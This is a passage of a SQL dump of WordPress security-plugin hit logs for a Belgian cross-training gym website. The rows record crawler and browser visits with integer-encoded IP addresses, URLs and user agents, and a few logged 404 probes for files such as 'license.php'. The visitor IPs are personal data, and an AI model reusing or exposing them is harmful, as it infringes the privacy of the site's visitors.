(72639, 1494831352.538114, 772030661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(72640, 1494831356.329307, 772030661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(72641, 1494831356.768656, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(72642, 1494831359.355271, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(72643, 1494831362.396035, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(72644, 1494831364.775126, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(72645, 1494831366.836339, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(72646, 1494831369.431743, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(72647, 1494831373.566834, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(72648, 1494832025.690155, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72649, 1494832318.126615, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72650, 1494835612.277178, 2763076217, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.fr/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(72651, 1494835615.389155, 2763076217, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(72652, 1494835653.072153, 1123632437, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72653, 1494838875.957370, 2637637384, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72654, 1494838876.104705, 2637637384, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72655, 1494841456.547105, 96260878, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72656, 1494841457.631009, 96260878, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72657, 1494841458.260601, 96260878, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72658, 1494841460.242959, 96260878, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72659, 1494841461.282869, 96260878, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72660, 1494841462.535189, 96260878, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72661, 1494841463.197684, 96260878, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72662, 1494844993.069008, 3233510666, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/license.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(72663, 1494844997.641842, 3233510666, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/license.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(72664, 1494846182.080304, 1407831882, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (CMS Crawler: http://www.cmscrawler.com)'),
(72665, 1494853549.049803, 3267064321, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&sqi=2&ved=0ahUKEwig0pmq-_HTAhVPZlAKHQHmAlsQ_BcIiwEwEA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(72666, 1494857608.745680, 1538461267, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj5qY3EivLTAhWEWhoKHfIOBEkQFggjMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(72667, 1494857610.201864, 1538461267, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(72668, 1494857620.583297, 1538461267, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(72669, 1494857621.603446, 1538461267, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(72670, 1494857633.294932, 1538461267, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(72671, 1494859111.136401, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72672, 1494859111.843165, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72673, 1494859112.333811, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72674, 1494859112.881416, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72675, 1494859113.483967, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72676, 1494859114.001899, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72677, 1494859114.615761, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72678, 1494859115.112125, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72679, 1494859115.592128, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72680, 1494859116.085802, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72681, 1494859116.595841, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72682, 1494860963.769625, 1078646641, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '\\\'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\\\''),
(72683, 1494864343.493274, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72684, 1494864344.044102, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72685, 1494864672.802208, 1123632437, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72686, 1494864699.321499, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72687, 1494869839.516868, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(72688, 1494870076.317725, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72689, 1494872837.925699, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72690, 1494879255.334366, 783531305, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72691, 1494879255.916776, 783531305, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72692, 1494879256.417376, 783531305, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72693, 1494879256.899901, 783531305, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72694, 1494879257.373991, 783531305, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72695, 1494879257.884135, 783531305, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72696, 1494879258.478741, 783531305, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72697, 1494879258.927836, 783531305, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72698, 1494879259.403395, 783531305, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72699, 1494879259.935203, 783531305, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72700, 1494879260.414274, 783531305, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72701, 1494880488.768877, 1123633622, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72702, 1494882095.209162, 2637637384, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72703, 1494883221.185391, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72704, 1494883744.335437, 1538592159, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/26.0.154727556 Mobile/14E304 Safari/602.1'),
(72705, 1494884142.279859, 2637637384, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72706, 1494884989.627773, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72707, 1494885171.378957, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72708, 1494885762.303324, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72709, 1494886344.391133, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72710, 1494887065.075725, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72711, 1494887428.144346, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72712, 1494887740.106839, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72713, 1494888355.787293, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72714, 1494889011.761218, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72715, 1494889641.488213, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72716, 1494890190.317093, 1123633622, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72717, 1494890313.803347, 1123633622, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72718, 1494890988.672712, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72719, 1494891623.296908, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72720, 1494891623.388374, 1123633622, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72721, 1494893920.442925, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72722, 1494894567.190547, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72723, 1494894759.928239, 1123633622, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72724, 1494895069.399873, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72725, 1494895237.808261, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72726, 1494895908.290835, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72727, 1494896579.104577, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72728, 1494896780.321851, 2745959577, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(72729, 1494896865.334115, 2997442321, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/class-comments.php?blog=comments&title=American%20Power%20and%20Gas%20Reviews', 'http://www.crosstrainingcenter.be/wp-includes/class-comments.php?blog=comments&title=American%20Power%20and%20Gas%20Reviews', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72730, 1494897201.197632, 2731721858, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(72731, 1494897205.366295, 2731721858, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(72732, 1494897207.319243, 2731721858, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(72733, 1494897213.501877, 2731721858, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(72734, 1494897288.508803, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72735, 1494897989.569736, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72736, 1494898472.667352, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72737, 1494898607.637991, 2637637627, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72738, 1494901045.661649, 3024883613, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(72739, 1494902069.092980, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72740, 1494906134.069651, 2637637514, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72741, 1494906205.189629, 2637637514, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72742, 1494906768.742188, 2637637514, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72743, 1494906919.858525, 2637637514, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72744, 1494906959.396733, 1123633622, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72745, 1494909815.907945, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(72746, 1494909816.513551, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72747, 1494909817.234521, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72748, 1494909817.754097, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72749, 1494909818.245068, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72750, 1494909818.841277, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72751, 1494909819.616280, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72752, 1494909820.575947, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72753, 1494909821.518520, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72754, 1494909822.379549, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72755, 1494909822.901626, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72756, 1494909823.506634, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72757, 1494909832.291338, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72758, 1494909832.731609, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72759, 1494912730.528529, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72760, 1494912731.133696, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72761, 1494912731.568695, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72762, 1494912732.003176, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72763, 1494912732.462590, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72764, 1494912732.910162, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72765, 1494912733.675317, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
